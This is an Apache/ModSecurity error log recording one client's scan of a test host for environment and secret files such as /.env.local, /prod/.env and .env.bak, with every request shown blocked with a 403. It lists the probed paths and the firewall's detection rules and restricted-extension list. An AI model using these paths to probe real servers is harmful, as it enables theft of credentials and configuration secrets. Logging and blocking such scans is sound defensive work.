[Tue Feb 03 13:09:22.967661 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlwAAAAc"]
[Tue Feb 03 13:09:22.967895 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlwAAAAc"]
[Tue Feb 03 13:09:22.968094 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlwAAAAc"]
[Tue Feb 03 13:09:23.663658 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aYHlc8jmlDJOeCd6_UCXmAAAAAc"]
[Tue Feb 03 13:09:23.663910 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aYHlc8jmlDJOeCd6_UCXmAAAAAc"]
[Tue Feb 03 13:09:23.664119 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aYHlc8jmlDJOeCd6_UCXmAAAAAc"]
[Tue Feb 03 13:09:23.758724 2026] [authz_core:error] [pid 1843380] [client 195.178.110.33:53506] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Tue Feb 03 13:09:23.980948 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aYHlcwnRhLBsEJ84m135BAAAAAg"]
[Tue Feb 03 13:09:23.981165 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aYHlcwnRhLBsEJ84m135BAAAAAg"]
[Tue Feb 03 13:09:23.981345 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aYHlcwnRhLBsEJ84m135BAAAAAg"]
[Tue Feb 03 13:09:24.021713 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aYHldAnRhLBsEJ84m135BQAAAAg"]
[Tue Feb 03 13:09:24.021920 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aYHldAnRhLBsEJ84m135BQAAAAg"]
[Tue Feb 03 13:09:24.022072 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aYHldAnRhLBsEJ84m135BQAAAAg"]
[Tue Feb 03 13:09:24.060830 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aYHldAnRhLBsEJ84m135BgAAAAg"]
[Tue Feb 03 13:09:24.061034 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aYHldAnRhLBsEJ84m135BgAAAAg"]
[Tue Feb 03 13:09:24.061184 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aYHldAnRhLBsEJ84m135BgAAAAg"]
[Tue Feb 03 13:09:24.098407 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aYHldAnRhLBsEJ84m135BwAAAAg"]
[Tue Feb 03 13:09:24.098712 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aYHldAnRhLBsEJ84m135BwAAAAg"]
[Tue Feb 03 13:09:24.098931 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aYHldAnRhLBsEJ84m135BwAAAAg"]
[Tue Feb 03 13:09:24.142738 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aYHldAnRhLBsEJ84m135CAAAAAg"]
[Tue Feb 03 13:09:24.142939 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aYHldAnRhLBsEJ84m135CAAAAAg"]
[Tue Feb 03 13:09:24.143090 2026] [:error] [pid 1843380] [client 195.178.110.33:53506] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aYHldAnRhLBsEJ84m135CAAAAAg"]
[Tue Feb 03 13:09:24.941974 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aYHldGkgoJaKC5jg5OxytQAAAAk"]
[Tue Feb 03 13:09:24.942245 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aYHldGkgoJaKC5jg5OxytQAAAAk"]
[Tue Feb 03 13:09:24.942496 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aYHldGkgoJaKC5jg5OxytQAAAAk"]
[Tue Feb 03 13:09:25.100266 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aYHldWkgoJaKC5jg5OxytgAAAAk"]
[Tue Feb 03 13:09:25.100496 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aYHldWkgoJaKC5jg5OxytgAAAAk"]
[Tue Feb 03 13:09:25.100669 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aYHldWkgoJaKC5jg5OxytgAAAAk"]
[Tue Feb 03 13:09:25.310394 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aYHldWkgoJaKC5jg5OxytwAAAAk"]
[Tue Feb 03 13:09:25.310624 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aYHldWkgoJaKC5jg5OxytwAAAAk"]
[Tue Feb 03 13:09:25.310793 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aYHldWkgoJaKC5jg5OxytwAAAAk"]
[Tue Feb 03 13:09:25.586870 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aYHldWkgoJaKC5jg5OxyuAAAAAk"]
[Tue Feb 03 13:09:25.587091 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aYHldWkgoJaKC5jg5OxyuAAAAAk"]
[Tue Feb 03 13:09:25.587315 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aYHldWkgoJaKC5jg5OxyuAAAAAk"]
[Tue Feb 03 13:09:25.788555 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aYHldWkgoJaKC5jg5OxyuQAAAAk"]
[Tue Feb 03 13:09:25.788791 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aYHldWkgoJaKC5jg5OxyuQAAAAk"]
[Tue Feb 03 13:09:25.788979 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aYHldWkgoJaKC5jg5OxyuQAAAAk"]
[Tue Feb 03 13:09:26.861509 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aYHldmkgoJaKC5jg5OxyuwAAAAk"]
[Tue Feb 03 13:09:26.861638 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aYHldmkgoJaKC5jg5OxyuwAAAAk"]
[Tue Feb 03 13:09:26.861840 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aYHldmkgoJaKC5jg5OxyuwAAAAk"]
